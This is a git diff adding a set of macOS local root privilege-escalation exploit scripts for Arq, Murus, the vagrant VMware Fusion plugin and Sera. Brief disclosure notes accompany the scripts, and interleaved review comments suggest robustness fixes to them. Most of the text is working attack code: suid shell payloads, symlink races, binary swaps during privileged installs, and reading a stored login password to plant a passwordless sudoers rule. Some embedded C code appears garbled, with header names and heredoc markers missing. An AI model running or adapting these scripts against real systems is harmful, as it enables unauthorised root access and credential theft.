diff --git a/exploits/macos/local/43216.rb b/exploits/macos/local/43216.rb
new file mode 100755
index 000000000..579c020d4
--- /dev/null
+++ b/exploits/macos/local/43216.rb
@@ -0,0 +1,88 @@ +=begin +As well as the other bugs affecting Arq <= 5.9.6 there is also another issue +with the suid-root restorer binaries in Arq for Mac. There are three of them +and they are used to execute restores of backed up files from the various +cloud providers. + +After reversing the inter-app protocol I discovered that the path to the +restorer binary was specified as part of the data packet sent by the UI. After +receiving this, the restorer binaries then set +s and root ownership on this +path. This means we can specify an arbitrary path which will receive +s and root +ownership. + +This issue is fixed in Arq 5.10. +=end + +#!/usr/bin/env ruby + +################################################################## +###### Arq <= 5.9.7 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +################################################################## + +s = File.stat("/Applications/Arq.app/Contents/Resources/standardrestorer") + +if s.mode != 0104755 or s.uid != 0 + puts "Not vulnerable - standardrestorer is not suid root." 
+ exit 1 +end + +binary_target = "/tmp/arq_597_exp" + +d = "\x01\x00\x00\x00\x00\x00\x00\x00" +e = "\x00\x00\x00\x00\x03" +z = "0000" +target = sprintf("%s%s-%s-%s-%s-%s%s%s", z,z,z,z,z,z,z,z) +plist = "<\/dict><\/plist>" +backup_set = "0" * 40 +hmac = "0" * 40 + +payload = sprintf( + "%s%s%s%s\$%s%s\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00" + + "\x00\x00\x00\x00\x00\x09\x00\x00\x02\xd0\x96\x82\xef\xd8\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x30\x2e\x30" + + "\x30\x30\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + "\x00\x00\x00\x00\x00\x00\x00%s%s%s\x28%s\x01\x00\x00\x00%s\x00\x00\x00%s" + + "\x00\x00\x00\x00\x16\x00\x00\x00\x02%s\x28%s\x01\x00\x00\x00%s\x00\x00" + + "\x00%s\x00\x00\x00\x00\x00\x00\x00\x01\xf5\x00\x00\x00\x00\x00\x00\x00" + + "\x14\x00%s\x00\x00\x00\x00\x03%s\x0a", + d, binary_target.length.chr, binary_target, + d, target, + d, plist.length.chr, plist, + d, backup_set, + d, d, d, hmac, + d, d, d, e * 10 + ) + +shellcode = "#include \nint main()\n{ setuid(0);setgid(0);"+ + "execl(\"/bin/bash\",\"bash\",\"-c\",\"rm -f #{binary_target};/bin/bash\","+ + "NULL);return 0; }" + +IO.popen("gcc -xc -o #{binary_target} -", mode="r+") do |io| + io.write(shellcode) + io.close +end + +IO.popen("/Applications/Arq.app/Contents/Resources/standardrestorer " + + "2>/dev/null", mode="r+") do |io| + io.getc && io.write(payload) +end + +timeout=3 +i=0 + +while (s = File.stat(binary_target)) && (s.mode != 0104755 or s.uid != 0) + sleep 0.1 + i += 1 + + if i >= (timeout * 10) + break + end +end + +if s.mode == 0104755 and s.uid == 0 + system(binary_target) + exit 0 +end + +puts "exploit failed" \ No newline at end of file diff --git a/exploits/macos/local/43217.sh b/exploits/macos/local/43217.sh new file mode 100755 index 000000000..2204ea940 --- /dev/null +++ b/exploits/macos/local/43217.sh 
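Review bot: Both `IO.popen(..., mode="r+")` calls assign a throwaway local named `mode` and pass the string positionally, which reads like a keyword argument but is not one; `IO.popen("gcc -xc -o #{binary_target} -", "r+") do |io|` (and likewise for the standardrestorer call) says what actually executes. The `#!/usr/bin/env ruby` line sits after the `=begin`/`=end` block, so despite the 100755 mode it is not an interpreter line; either move the commentary below it or drop the shebang. Separately, angle-bracketed tokens appear to be missing in this view (`#include \n` with no header name in the C string here, and the heredoc terminators and `#include` targets in 43217.sh through 43225.sh); that may be a rendering artefact rather than the committed bytes, but as shown none of those C payloads would compile and the files cannot be checked against the hashes in their headers.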
@@ -0,0 +1,89 @@ +# I recently blogged about the prevalence of escalation hijack vulnerabilities amongst macOS applications. One example of this is the latest version of Murus +# firewall. By design it requires the user to authenticate every time in order to obtain the access it needs to modify the firewall settings. + +# If a local attacker or malware is running as an admin user (ie has write access to /Applications/) they can subvert this process to silently obtain root access +# without the user knowing. + +# https://m4.rkw.io/murus1.4.11.sh.txt +# 9c332c07747e11c78c34f9dc8d30127250d95edd5e58a571ed1a005eafd32301 +# ------------------------------------------------------------------------------- +#!/bin/bash + +################################################################## +###### Murus 1.4.11 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +################################################################## + +echo "compiling payloads..." + +cat > /tmp/murus411_exp.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL); + return 0; +} +EOF + +gcc -o /tmp/murus411_exp /tmp/murus411_exp.c + +if [ ! $? -eq 0 ] ; then + rm -f /tmp/murus411_exp.c + echo "failed to compile, dev tools may not be installed" + exit 1 +fi + +rm -f /tmp/murus411_exp.c + +cat > /tmp/murus411_exp2.c < +#include +int main() +{ + setuid(0); + seteuid(0); + system("chown root:wheel /tmp/murus411_exp"); + system("chmod 4755 /tmp/murus411_exp"); + system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\ +Murus.app/Contents/MacOS/Murus"); + execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL); + return 0; +} +EOF + +gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c +rm -f /tmp/murus411_exp2.c + +echo "waiting for loader..." + +while : +do + ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \ + |grep -v grep 1>/dev/null + if [ $? 
-eq 0 ] ; then + break + fi +done + +echo "planting payload..." + +mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\ +Contents/MacOS/Murus.orig +mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus + +echo "waiting for payload to trigger..." + +while : +do + r=`ls -la /tmp/murus411_exp |grep root` + if [ "$r" != "" ] ; then + break + fi + sleep 0.1 +done + +echo "kapow" + +/tmp/murus411_exp \ No newline at end of file diff --git a/exploits/macos/local/43218.sh b/exploits/macos/local/43218.sh new file mode 100755 index 000000000..0987fdfc7 --- /dev/null +++ b/exploits/macos/local/43218.sh 
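Review bot: The `# https://m4.rkw.io/murus1.4.11.sh.txt` / `# 9c332c07…` header pair carries no explanation, and since this archived copy prepends the commentary and separator the SHA-256 is presumably that of the linked download rather than of this file; a comment such as `# SHA-256 of the upstream download above, not of this archived copy` would stop readers treating it as an integrity check for the repository file. The same URL/hash pairs appear undocumented in 43218.sh, 43219.sh, 43220.sh, 43221.sh, 43222.sh, 43223.sh, 43224.sh and 43225.sh. As a style point, `if [ ! $? -eq 0 ] ; then` after the first gcc reads more directly as `if ! gcc -o /tmp/murus411_exp /tmp/murus411_exp.c ; then`.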
@@ -0,0 +1,78 @@ +# Arq Backup from Haystack Software is a great application for backing up macs and +# windows machines. Unfortunately versions of Arq for mac before 5.9.7 are +# vulnerable to a local root privilege escalation exploit. + +# The updater binary has a "setpermissions" function which sets the suid bit and +# root ownership on itself but it suffers from a race condition that allows you to +# swap the destination for these privileges using a symlink. + +# We can exploit this to get +s and root ownership on any arbitrary binary. + +# Other binaries in the application also suffer from the same issue. + +# This was fixed in Arq 5.9.7. + +# https://m4.rkw.io/arq_5.9.6.sh.txt +# 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d +# ------------------------------------------------------------------------------ +#!/bin/bash + +################################################################## +###### Arq <= 5.9.6 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html #### +################################################################## + +vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\ +Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \ +|grep root` + +cwd="`pwd`" + +if [ "$vuln" == "" ] ; then + echo "Not vulnerable - auto-updates not enabled." 
+ exit 1 +fi + +cat > arq_596_exp.c < +int main() +{ + setuid(0); + seteuid(0); + execl( + "/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash", + NULL + ); + return 0; +} +EOF + +gcc -o arq_596_exp arq_596_exp.c +rm -f arq_596_exp.c + +ln -s /Applications/Arq.app/Contents/Library/LoginItems/\ +Arq\ Agent.app/Contents/Resources/arq_updater + +./arq_updater setpermissions &>/dev/null& +rm -f ./arq_updater +mv arq_596_exp ./arq_updater + +i=0 +timeout=10 + +while : +do + r=`ls -la ./arq_updater |grep root` + if [ "$r" != "" ] ; then + break + fi + sleep 0.1 + i=$((i+1)) + if [ $i -eq $timeout ] ; then + rm -f ./arq_updater + echo "Not vulnerable" + exit 1 + fi +done + +./arq_updater \ No newline at end of file diff --git a/exploits/macos/local/43219.sh b/exploits/macos/local/43219.sh new file mode 100755 index 000000000..ee04dfeb5 --- /dev/null +++ b/exploits/macos/local/43219.sh 
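Review bot: `timeout=10` combined with `sleep 0.1` and `i=$((i+1))` bounds the wait loop at one second, not ten, so the variable name misstates the unit; a comment `# timeout is counted in 0.1 s ticks` or a rename to `max_ticks` would make the intent clear without changing behaviour. The same counter idiom in 43216.rb uses `timeout=3` and compares against `timeout * 10`, so there the name really does mean seconds and the two files disagree with each other.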
@@ -0,0 +1,161 @@ +# Another day, another root privesc bug in this plugin. Not quite so serious this +# time - this one is only exploitable if the user has the plugin installed but +# VMware Fusion *not* installed. This is a fairly unlikely scenario but it's a +# straight to root privesc with no user interaction so isn't the kind of thing +# that should be shipping with any software. + +# This occurs because the suid root sudo helper that I have discussed in previous +# exploit writeups executes /Applications/VMware +# Fusion.app/Contents/Library/vmnet-cli +# as root, but if the application isn't installed and we're a local admin user we +# can create a fake app directory with a payload in place of vmnet-cli that gets +# executed as root. + +# HashiCorp fixed this (very quickly) in 5.0.4. + +# https://m4.rkw.io/vagrant_vmware_privesc_5.0.3.sh.txt +# 3c11083386b3f7352d60b327190eed4364383c0622351db5410d809f4bda746a +# ------------------------------------------------------------------------------ +#!/bin/bash +echo +echo "#########################################################" +echo "# vagrant_vmware_fusion plugin 5.0.3 local root privesc #" +echo "# by m4rkw - https://m4.rkw.io/blog.html #"; +echo "#########################################################" +echo "# Note: only works when VMWare Fusion is not installed. #" +echo "#########################################################" +echo + +cleanup() { + exec 2> /dev/null + killall -9 vagrant 1>/dev/null 2>/dev/null + kill -9 `ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2` &>/dev/null + exec 2> /dev/tty + cd + rm -rf .vagrant_vmware_fusion_503_exp + rm -rf /Applications/VMware\ Fusion.app +} + +if [ -e "/Applications/VMware Fusion.app" ] ; then + echo "Fusion is installed, not exploitable." + exit 1 +fi + +echo "setting up fake app directory..." + +mkdir /Applications/VMware\ Fusion.app +if [ ! $? -eq 0 ] ; then + echo "Failed to create /Applications/VMware Fusion.app." 
+ exit 1 +fi + +mkdir -p /Applications/VMware\ Fusion.app/Contents/Library/services + +touch /Applications/VMware\ Fusion.app/Contents/Library/vmrun +touch /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services +chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmrun +chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/services/Open\ VMware\ Fusion\ Services + +cat > /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx <&2 +echo "VMware Fusion Information:" 1>&2 +echo "VMware Fusion 10.0.1 build-6754183 Release" 1>&2 +echo +EOF + +chmod 755 /Applications/VMware\ Fusion.app/Contents/Library/vmware-vmx + +cat > /Applications/VMware\ Fusion.app/Contents/Library/vmnet-cli < /tmp/vvp_503.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","rm -f /tmp/vvp_503; /bin/bash",NULL); + return 0; +} +EOF +gcc -o /tmp/vvp_503 /tmp/vvp_503.c +rm -f /tmp/vvp_503.c + +cd +mkdir .vagrant_vmware_fusion_503_exp +cd .vagrant_vmware_fusion_503_exp + +echo "writing dummy vagrantfile ..." + +cat > vagrantfile </dev/null & + +while : +do + r=`ps auxwww |grep 'vagrant up' |grep -v grep` + if [ "$r" == "" ] ; then + break + fi + sleep 0.5 +done + +echo "dropping dummy machine..." + +uuid=`ls -1 .vagrant/machines/default/vmware_fusion |grep -v vagrant_cwd` +touch .vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx +echo -n "`pwd`/.vagrant/machines/default/vmware_fusion/$uuid/ubuntu-xenial-vmware-fusion.vmx" > .vagrant/machines/default/vmware_fusion/id + +echo "triggering vagrant up [stage 2]..." + +vagrant up &>/dev/null & + +echo "waiting for payload to trigger ..." 
+ +count=0 +success=0 + +while : +do + r=`ls -la /tmp/vvp_503 |grep -- '-rwsr-xr-x 1 root wheel'` + if [ "$r" != "" ] ; then + success=1 + break + fi + r=`ps auxwww |grep 'vagrant up' |grep -v grep` + if [ "$r" == "" ] ; then + break + fi + sleep 0.2 + count=$(($count + 1)) + if [ $count -eq 250 ] ; then + echo "Timed out waiting for the payload to trigger." + cleanup + exit 1 + fi +done + +cleanup + +if [ ! $success -eq 1 ] ; then + echo "exploit failed." + exit 1 +fi + +echo +cd +/tmp/vvp_503 \ No newline at end of file diff --git a/exploits/macos/local/43220.sh b/exploits/macos/local/43220.sh new file mode 100755 index 000000000..92d1d61aa --- /dev/null +++ b/exploits/macos/local/43220.sh 
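Review bot: `cleanup` is invoked only on the explicit timeout, failure and success paths and is never registered with `trap`, so an interrupted run (Ctrl-C during either `vagrant up` wait) leaves the fabricated `/Applications/VMware Fusion.app` bundle, `~/.vagrant_vmware_fusion_503_exp` and `/tmp/vvp_503` on disk; the header should list these as the artefacts such a run leaves behind. `cleanup` also does `rm -rf /Applications/VMware\ Fusion.app` unconditionally; the `-e` guard at the top is what prevents this touching a real install, and a one-line comment on the function saying it relies on that guard would make the destructive line safer to maintain.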
@@ -0,0 +1,79 @@ +# I recently blogged about how the installation process of version 5.0.0 of this +# plugin could be hihacked by a local attacker or malware in order to escalate +# privileges to root. Hashicorp pushed some mitigations for this issue fairly +# quickly but unfortunately 5.0.1 is still exploitable with a slightly different +# approach. + +# They removed the chmod/chown shell commands from their osascript invocation and +# instead simply executed their installer as root, but apparently didn't realise +# that the installer is not root-owned so can be swapped out by a local attacker +# during the process. + +# This issue is fixed in version 5.0.2. + +# https://m4.rkw.io/vagrant_vmware_privesc_5.0.1.sh.txt +# c38ecc9fdb4f37323338e8fd12b851133a2121f3505cde664e6d32f1ef49ba23 +# ----------------------------------------------------------------------------- +#!/bin/bash +echo "########################################" +echo "vagrant_vmware_fusion 5.0.1 root privesc" +echo "by m4rkw" +echo "########################################" +echo +echo "compiling..." 
+ +cat > vvf.c < +#include +#include +int main(int ac, char *av[]) +{ + setuid(0); + seteuid(0); + if (ac > 1) { + system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 /tmp/vvf_exp"); + system("chown root:wheel /tmp/vvf_exp"); + system("chmod 4755 /tmp/vvf_exp"); + system("mv -f $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64.orig $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64"); + system("$HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop/vagrant-vmware-installer_darwin_amd64 install\012"); + return 0; + } + system("rm -f /tmp/vvf_exp"); + execl("/bin/bash","bash",NULL); + return 0; +} +EOF + +gcc -o /tmp/vvf_exp vvf.c +rm -f vvf.c + +echo "waiting for user to initiate vagrant plugin update..." + +while : +do + r=`ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant-vmware-installer_darwin_amd64'` + if [ "$r" != "" ] ; then + break + fi +done + +pid=`ps auxww |grep './vagrant-vmware-installer_darwin_amd64 install' |grep -v grep |xargs -L1 |cut -d ' ' -f2` + +cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.1/ext/vagrant-vmware-desktop + +echo "dropping payload in place of installer binary..." + +mv -f vagrant-vmware-installer_darwin_amd64 vagrant-vmware-installer_darwin_amd64.orig +mv -f /tmp/vvf_exp vagrant-vmware-installer_darwin_amd64 + +echo "waiting for payload to trigger..." + +while : +do + r=`ls -la /tmp/vvf_exp 2>/dev/null |grep -- '-rwsr-xr-x' |grep root` + if [ "$r" != "" ] ; then + echo "spawning shell..." + /tmp/vvf_exp + exit 0 + fi +done \ No newline at end of file diff --git a/exploits/macos/local/43221.sh b/exploits/macos/local/43221.sh new file mode 100755 index 000000000..8a38e248a --- /dev/null +++ b/exploits/macos/local/43221.sh 
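Review bot: `pid=` is assigned from the `ps auxww |grep './vagrant-vmware-installer_darwin_amd64 install' …` pipeline and never read anywhere in this file, so that line is dead code; it looks carried over from 43222.sh, where `pid` feeds `kill -STOP`/`kill -CONT`. Either drop it or add a comment saying why it is kept. Both `while :` polling loops here, and the first one in 43217.sh and both in 43222.sh, have neither a `sleep` nor an upper bound, unlike the bounded sleeping loops in 43219.sh and 43223.sh; aligning the idiom across the set would make the scripts easier to read side by side.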
@@ -0,0 +1,46 @@ +# Sera is a free app for mac and iOS that lets you unlock your mac automatically +# when your iphone is within a configured proximity. + +# Unfortunately to facilitate this it stores the users login password in their +# home directory at: + +# ~/Library/Preferences/no.ignitum.SeraOSX.plist + +# This makes root privilege escalation trivial and worse than that even +# facilitates dumping the keychain as we can easily obtain the user's login +# password. If they are an admin user we can even dump items from the system +# keychain. + +# The author of Sera has said he will shut the project down and make the code +# publicly available so no fix is likely to be forthcoming anytime soon. + +# It is strongly recommended not to use this app and if you have done so in the +# past make sure you remove this file that contains your login password. + +# https://m4.rkw.io/sera_1.2.sh.txt +# dbf4f7b64cac8a60a2c7b3ba2a3988b84a148a3f6e31bcb58d4554e5e74d8edf +# ------------------------------------------------------------------------- +#!/bin/bash + +############################################################## +###### sera 1.2 local root privilege escalation exploit ###### +###### by m4rkw - https://m4.rkw.io/blog.html ###### +############################################################## + +sera_pass=`plutil -p ~/Library/Preferences/no.ignitum.SeraOSX.plist |grep '"sera_pass"' |cut -d '"' -f4` + +if [ "$sera_pass" == "" ] ; then + echo "Password not found." + exit 1 +fi + +echo "user's password is: $sera_pass" + +user="`whoami`" + +echo "$user ALL=(ALL) NOPASSWD:ALL" > /tmp/sera_12_exp + +echo "$sera_pass" | sudo -S chown root:wheel /tmp/sera_12_exp 1>/dev/null 2>/dev/null +echo "$sera_pass" | sudo -S mv /tmp/sera_12_exp /etc/sudoers.d/sera_12_exp 1>/dev/null 2>/dev/null + +sudo bash -c 'rm -f /etc/sudoers.d/sera_12_exp; /bin/bash' \ No newline at end of file 
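Review bot: The header's remediation advice ("make sure you remove this file") is the line most readers need, yet it sits several paragraphs below the path it refers to; restating it beside the path, e.g. `# Remediation: delete ~/Library/Preferences/no.ignitum.SeraOSX.plist and change the login password it stored`, would make it hard to miss. The script also prints the recovered credential with `echo "user's password is: $sera_pass"` and pipes it through `echo … | sudo -S`, so it lands in terminal scrollback and any session log; a comment noting that the output contains a live password is warranted. Finally, `/etc/sudoers.d/sera_12_exp` is removed only inside the closing `sudo bash -c`, so if that step does not run the NOPASSWD rule persists — worth documenting as a leftover to check for.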
diff --git a/exploits/macos/local/43222.sh b/exploits/macos/local/43222.sh
new file mode 100755
index 000000000..c030a64cb
--- /dev/null
+++ b/exploits/macos/local/43222.sh
@@ -0,0 +1,108 @@ +# After three CVEs and multiple exploits disclosed to Hashicorp they have finally upped their game with this plugin. Now the previously vulnerable non-root-owned +# ruby code that get executed as root by the sudo helper is no more and the sudo helper itself is one static Go binary with tightly-controlled parameters that +# can't (as far as I can tell) be exploited on its own. + +# However I have discovered that the update mechanism in 5.0.0 is not completely safe. There is a bug in the update mechanism for 5.0.0 that makes it reinstall +# the plugin when you run: + +# $ vagrant plugin update + +# even if there is no update pending. The reinstall includes replacing the sudo helper and re-applying root ownership and the suid bit. This is done via +# osascript with a block of shell as an easy way to show a graphical popup authentication dialog to the user. + +# After the credentials are entered and the permissions are applied the installer for the plugin immediately checks the hash of the sudo helper binary and if it +# doesn't match it removes it. On the surface this seemed to make a race condition impossible however after some poking around I found a way to exploit it. + +# Because the authentication prompt is a guarantee of at least a few seconds pause in the intallation, we can catch this point in time very easily by scanning the +# process list watching for the invocation of osascript. Once we see this we can lay a trap by replacing the sudo helper binary with an exploit payload (remember +# this is always in a non-root-owned directory). + +# As soon as the privileges are set vagrant will execute its checksum and remove the payload, however because we've caught execution at the right time and +# because the installer is a different process from the osascript process we can send a STOP signal to the installer to pause its execution. 
This means osascript +# will set the permissions and then the installer will not immediately remove the binary, giving us time to move our newly suid-root'd payload out of the way, use +# it to obtain root privileges, and then move the real sudo helper back into place and chmod +s it ourselves so that vagrant doesn't realise anything bad has +# happened. + +# This all takes place in a second or two so the user is unlikely to notice either. Once this is done we simply send a CONT signal to the installer to allow +# it to continue as normal. The plugin is installed correctly with the right permissions, the user didn't see any errors or warnings, and we have an suid +# root payload that we can execute to spawn a root shell. + +# This issue is fixed in version 5.0.1. + +# https://m4.rkw.io/vagrant_vmware_privesc_5.0.0.sh.txt +# cdbdf9e620eba0d897a3ef92b6872dbb0b194eaf548c23953a42678a566f71f0 +# ------------------------------------------------------------------------------- +#!/bin/bash +echo "########################################" +echo "vagrant_vmware_fusion 5.0.0 root privesc" +echo "by m4rkw" +echo "########################################" +echo +echo "compiling..." + +cat > vvf.c < +#include +#include +int main(int ac, char *av[]) +{ + setuid(0); + seteuid(0); + if (ac > 1) { + system("chown root vagrant_vmware_desktop_sudo_helper_darwin_amd64"); + system("chmod 4755 vagrant_vmware_desktop_sudo_helper_darwin_amd64"); + return 0; + } + system("rm -f /tmp/vvf_exp"); + execl("/bin/bash","bash",NULL); + return 0; +} +EOF + +gcc -o /tmp/vvf_exp vvf.c +rm -f vvf.c + +echo "waiting for user to initiate vagrant plugin update..." + +while : +do + r=`ps auxwww |grep '/usr/bin/osascript -e do shell script' |grep 'vagrant_vmware_desktop_sudo_helper_darwin_amd64'` + if [ "$r" != "" ] ; then + break + fi +done + +pid=`ps auxww |grep './vagrant-vmware-installer_darwin_amd64' |grep -v grep |xargs -L1 |cut -d ' ' -f2` + +echo "pausing installer..." 
+ +kill -STOP $pid + +cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.0/bin + +echo "dropping payload in place of sudo helper binary..." + +mv -f vagrant_vmware_desktop_sudo_helper_darwin_amd64 vagrant_vmware_desktop_sudo_helper_darwin_amd64.orig +mv -f /tmp/vvf_exp vagrant_vmware_desktop_sudo_helper_darwin_amd64 + +echo "waiting for suid..." + +while : +do + r=`ls -la vagrant_vmware_desktop_sudo_helper_darwin_amd64 |grep -- '-rwsr-xr-x' |grep root` + if [ "$r" != "" ] ; then + echo "moving the real helper back into place..." + mv -f ./vagrant_vmware_desktop_sudo_helper_darwin_amd64 /tmp/vvf_exp + mv -f vagrant_vmware_desktop_sudo_helper_darwin_amd64.orig vagrant_vmware_desktop_sudo_helper_darwin_amd64 + + echo "fixing perms..." + /tmp/vvf_exp 1 + + echo "allow vagrant to continue..." + kill -CONT $pid + + echo "spawning shell..." + /tmp/vvf_exp + exit 0 + fi +done \ No newline at end of file diff --git a/exploits/macos/local/43223.sh b/exploits/macos/local/43223.sh new file mode 100755 index 000000000..daaeb719c --- /dev/null +++ b/exploits/macos/local/43223.sh 
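Review bot: `cd $HOME/.vagrant.d/gems/2.3.4/gems/vagrant-vmware-fusion-5.0.0/bin` is unchecked, and it runs after `kill -STOP $pid` has already suspended the installer; if the gem lives under a different Ruby directory the following `mv -f` calls operate in the caller's current directory and the installer stays stopped. `cd … || { kill -CONT $pid; exit 1; }` keeps that failure from leaving the user's process frozen; 43220.sh has the same unchecked `cd`. A short comment above `kill -STOP $pid` carrying the rationale already given in the header (the installer deletes the helper as soon as its checksum fails, so it is paused until the original is back in place) would spare the reader a trip to the description.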
@@ -0,0 +1,219 @@ +# I have previously disclosed a couple of bugs in Hashicorp's vagrant-vmware-fusion plugin for vagrant. + +# Unfortunately the 4.0.23 release which was supposed to fix the previous bug I reported didn't address the issue, so Hashicorp quickly put out another release +# - 4.0.24 - after that (but didn't update the public changelog on github). + +# Unfortunately 4.0.24 is still vulnerable, largely due to a fundamental design flaw in the way the plugin is written combined with the need to elevate +# privileges for certain functions within Fusion. + +# Because Hashicorp need users to be able to update the plugin as the local non-root user the encrypted ruby code that the plugin is comprised of must +# remain owned by the non-root user. This means there is a huge attack surface that we can exploit to manipulate the execution of the program and still get +# root on 4.0.24. + +# I wrote this exploit before Fusion 10 was released and on the surface 4.0.24 is not compatible with Fusion 10. Curiously though it can be fairly easily tricked +# into working (at least partially) with Fusion 10 simply by patching out the version check and creating a symlink. I discovered this while trying to get the +# 4.0.24 exploit working with Fusion 10 installed - we can simply monkey-patch the version check out of the code, create a symlink for a binary that VMWare +# moved in v10 and then we're away. I was able to vagrant up and ssh into the running vm without any issues. It also means I was able to update the exploit so +# that it works on Fusion 8.x and Fusion 10. + +# This seems to be (finally!) fixed properly in 4.0.25 by replacing the suid helper binary with a new go binary that contains all the required elevated +# operations and doesn't call back to the vulnerable ruby code. 
+ +# https://m4.rkw.io/vagrant_vmware_privesc_4.0.24_v8-10.sh.txt +# 30d54139620bf8e805805d34aa54f4f348b7371642828b28cd0f8c5a7a65c0e8 +# ----------------------------------------------------------------------------- +#!/bin/bash +echo +echo "**********************************************************" +echo "* vagrant_vmware_fusion plugin 4.0.24 local root privesc *" +echo "* by m4rkw - https://m4.rkw.io/blog.html *"; +echo "**********************************************************" +echo "* works against vmware fusion 8.x and 10.x - even though *" +echo "* 4.0.24 is not compatible with 10.x, we patch out the *" +echo "* version check ;) *" +echo "**********************************************************" +echo + +cleanup() { + exec 2> /dev/null + killall -9 vagrant 1>/dev/null 2>/dev/null + kill -9 `ps auxwww |egrep '\/vagrant up$' |xargs -L1 |cut -d ' ' -f2` &>/dev/null + exec 2> /dev/tty + x=`pwd |sed 's/.*\///'` + if [ "$x" == ".vagrant_vmware_fusion_4024_exp" ] ; then + cd .. + rm -rf .vagrant_vmware_fusion_4024_exp + fi + cd + rm -rf .vagrant_vmware_fusion_4024_exp + if [ -e "$target1.bak" ] ; then + mv -f $target1.bak $target1 + fi + if [ -e "$target2.orig" ] ; then + mv -f $target2.orig $target2 + fi +} + +vuln=`find ~/.vagrant.d//gems/2.3.4/gems/vagrant-vmware-fusion-4.0.24/bin -type f -perm +4000` + +if [ "$vuln" == "" ] ; then + echo "Vulnerable suid binary not found. It gets +s after the first vagrant up." + exit 1 +fi + +mkdir .vagrant_vmware_fusion_4024_exp +cd .vagrant_vmware_fusion_4024_exp + +echo "Looking for a vmware_desktop vagrant box ..." + +box=`vagrant box list |grep '(vmware_desktop' |head -n1 |cut -d ' ' -f1` + +download=0 + +if [ "$box" == "" ] ; then + download=1 + echo "No box found, defaulting to envimation/ubuntu-xenial ..." + box="envimation/ubuntu-xenial" +fi + +echo "Writing a dummy vagrantfile ..." 
+ +cat > vagrantfile < /tmp/v.c < +int main() +{ + setuid(0); + seteuid(0); + execl("/bin/bash","bash","-c","rm -f /tmp/v; /bin/bash",NULL); + return 0; +} +EOF2 +gcc -o /tmp/v /tmp/v.c +rm -f /tmp/v.c + +echo "Looking for the sudo_helper_cli.rb ..." + +target1=`find ~/.vagrant.d/ -name sudo_helper_cli.rb |grep vagrant-vmware-fusion-4.0.24` + +if [ $target1 == "" ] ; then + cleanup + echo "sudo_helper_cli.rb version 4.0.24 not found" + exit 1 +fi + +echo "Installing ruby payload ..." + +if [ ! -e "$target1.bak" ] ; then + mv -f $target1 $target1.bak + if [ ! $? -eq 0 ] ; then + cleanup + echo "Unable to rename $target1, may not be exploitable." + exit 1 + fi +fi + +cat > $target1 <&1 |grep 'VMware Fusion 10.'` + +if [ "$vc" != "" ] ; then + echo "Fusion 10.x detected, Patching out the version check ..." + + target2=`find ~/.vagrant.d/ -name driver.rb |grep vagrant-vmware-fusion-4.0.24` + + if [ "$target2" == "" ] ; then + cleanup + echo "driver.rb version 4.0.24 not found" + exit 1 + fi + + if [ ! -e "$target2.orig" ] ; then + mv -f $target2 $target2.orig + if [ ! $? -eq 0 ] ; then + cleanup + echo "Unable to rename $target2, may not be exploitable." + exit 1 + fi + fi + + cat > $target2 </dev/null & + +success=0 + + +if [ $download -eq 1 ] ; then + echo "*** we need to download the vmware box so this will take a minute or two ***" +fi + +echo "Waiting for payload to trigger ..." + +count=0 + +while : +do + r=`ls -la /tmp/v |grep -- '-rwsr-xr-x 1 root wheel'` + if [ "$r" != "" ] ; then + success=1 + break + fi + r=`ps auxwww |egrep '\/vagrant up$'` + if [ "$r" == "" ] ; then + break + fi + sleep 0.2 + count=$(($count + 1)) + if [ $count -eq 150 ] ; then + echo "Timed out waiting for the payload to trigger." + cleanup + exit 1 + fi +done + +cleanup + +if [ ! $success -eq 1 ] ; then + echo "Exploit failed." + exit 1 +fi + +echo + +/tmp/v \ No newline at end of file 
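Review bot: `if [ $target1 == "" ] ; then` leaves `$target1` unquoted, so when `find` returns nothing the test becomes `[ == "" ]`, `[` reports a unary-operator error and the "not found" branch is skipped; execution then falls through to `mv -f $target1 $target1.bak` and exits with the misleading "Unable to rename" message. The later `target2` check is quoted correctly (`[ "$target2" == "" ]`), so `if [ "$target1" == "" ] ; then` brings the two into line. `cleanup` also references `$target1` and `$target2` before either is assigned, which is harmless under bash's empty expansion but deserves a one-line comment so nobody "fixes" the ordering.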
